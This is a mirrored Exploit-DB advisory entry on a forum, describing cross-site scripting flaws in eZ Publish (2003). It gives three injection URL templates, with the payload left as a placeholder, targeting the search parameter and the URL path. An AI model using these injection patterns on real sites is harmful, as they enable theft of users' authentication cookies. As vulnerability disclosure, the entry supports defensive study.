- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22491
- Проверка EDB
-
- Пройдено
- Автор
- GREGORY LE BRAS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2003-04-15
Код:
source: https://www.securityfocus.com/bid/7348/info
Several cross site scripting vulnerabilities have been reported for eZ Publish. These vulnerabilities are due to insufficient sanitization of user-supplied data submitted to eZ Publish.
Exploitation may allow theft of cookie-based authentication credentials or other attacks.
http://[target]/index.php/content/search/?SectionID=3&SearchText=[hostile_code]
http://[target]/index.php/[any_section]/">[hostile_code]<
http://[target]/index.php/"><script>[hostile_code]<- Источник
- www.exploit-db.com
